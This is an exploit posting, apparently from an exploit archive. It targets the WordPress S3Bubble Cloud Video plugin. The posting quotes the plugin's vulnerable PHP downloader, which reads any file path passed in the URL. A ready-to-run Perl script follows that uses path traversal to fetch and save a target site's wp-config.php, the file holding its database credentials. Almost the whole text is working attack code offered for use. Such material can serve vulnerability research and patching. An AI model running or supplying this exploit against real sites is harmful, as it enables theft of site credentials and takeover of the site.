<?php
header("Content-Type: application/octet-stream");
header("Content-Disposition: attachment; filename=". $_GET['name']);
$path = urldecode($_GET['path']);
if(isset($path))readfile($path);
?>
use LWP::UserAgent;
system(($^O eq 'MSWin32') ? 'cls' : 'clear');
if(@ARGV < 2)
{
die("\n\n[+] usage : perl $0 site.com /path/");
}
print q{
Wordpress S3Bubble Cloud Video With Adverts & Analytics - Arbitrary File Download
->CrashBandicot
};
($Target,$path) = @ARGV;
if($Target !~ /^(http|https):\/\
{
$Target = "http://$Target";
}
$xpl = "/wp-content/plugins/s3bubble-amazon-s3-html-5-video-with-adverts/assets/plugins/ultimate/content/downloader.php?path=../../../../../../../wp-config.php";
my $url = $Target.$path.$xpl;
print "\n [?] Exploiting ...... \n\n";
$ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });
$req = $ua->get($url,":content_file" => "wp-config.php");
if ($req->is_success)
{
print "[+] $url Exploited!\n\n";
print "[+] File save to name : wp-config.php\n";
}
else
{
die("[!] Exploit Failed !\n");
}
_END_
Recommended Comments